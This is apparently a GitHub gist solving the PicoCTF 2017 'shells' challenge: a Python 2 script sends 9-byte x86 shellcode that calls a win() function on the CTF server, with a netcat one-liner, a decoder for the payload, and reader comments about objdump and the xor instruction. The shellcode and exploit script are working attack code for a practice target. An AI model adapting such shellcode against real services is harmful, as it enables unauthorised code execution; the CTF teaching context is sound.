Last active: May 16, 2018 19:57
```python
## Solution to level2-xpl75-shells @ PicoCTF 2017
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
# Python 2 script: the shellcode below is a str of raw bytes; Python 3 would need a bytes literal (b"...").
import sys, socket, struct

sys.path.append("../../LIBS/")
from int_netcat import Netcat  # author's own helper, linked above

nc = Netcat("shell2017.picoctf.com", 55049)
data = nc.read_until("10 bytes:\n")  # service reads at most 10 bytes
print(data)

# win() = 0x08048540
# Custom shellcode (9 bytes, fits the 10-byte read)
#  0: 31 c0             xor eax,eax        # clear eax
#  2: bb 40 85 04 08    mov ebx,0x8048540  # mov win() address to ebx (little-endian immediate)
#  8: ff d3             call ebx           # call ebx
shellcode = "\x31\xc0" + \
            "\xbb" + "\x40\x85\x04\x08" + \
            "\xff\xd3"
nc.write(shellcode)
data = nc.read()
print(data)

# 1liner: python -c 'print "\x31\xc0\xbb\x40\x85\x04\x08\xff\xd3"' | nc shell2017.picoctf.com 55049
```
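Before trusting the comments beside a byte string like the one above, it is worth decoding the bytes themselves. The following added example (not part of the gist) matches the fixed three-instruction pattern the gist documents, recovers the 32-bit target address from its little-endian immediate, and checks the payload against the 10-byte limit the service announces; it also accepts the shorter variant without the leading `xor eax,eax`, which the pattern does not depend on. The `PAYLOAD` constant is constructed from the opcode bytes listed in the gist.

```python
import struct

# Constructed from the opcode bytes in the gist's comments: xor eax,eax; mov ebx,imm32; call ebx.
PAYLOAD = bytes.fromhex("31c0bb40850408ffd3")


def decode_call_payload(blob: bytes) -> dict:
    """Decode the pattern  [xor eax,eax]  mov ebx,imm32  call ebx.

    Returns the decoded fields; raises ValueError for any other byte
    sequence, so an unexpected blob is reported instead of silently accepted.
    """
    i = 0
    clears_eax = False
    if blob[i:i + 2] == b"\x31\xc0":        # optional: xor eax,eax
        clears_eax = True
        i += 2
    if blob[i:i + 1] != b"\xbb" or len(blob) < i + 5:
        raise ValueError("expected mov ebx,imm32 at offset %d" % i)
    # Opcode BB is followed by a 4-byte immediate stored little-endian.
    target = struct.unpack("<I", blob[i + 1:i + 5])[0]
    i += 5
    if blob[i:i + 2] != b"\xff\xd3":        # FF /2 with ModRM D3: call ebx
        raise ValueError("expected call ebx at offset %d" % i)
    i += 2
    if i != len(blob):
        raise ValueError("%d trailing byte(s) after call" % (len(blob) - i))
    return {"clears_eax": clears_eax, "target": target, "length": i}


def fits_read(blob: bytes, limit: int = 10) -> bool:
    """The challenge service reads at most `limit` bytes ("10 bytes:" prompt)."""
    return len(blob) <= limit


if __name__ == "__main__":
    info = decode_call_payload(PAYLOAD)
    print("target=0x%08x clears_eax=%s length=%d fits=%s"
          % (info["target"], info["clears_eax"], info["length"], fits_read(PAYLOAD)))
```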
What is the trick to determine that win() = 0x08048540?
I found out: objdump -d shell
Hey there. Could you explain why you needed
xor eax, eax
? I did
and it worked fine.
Thanks in advance :)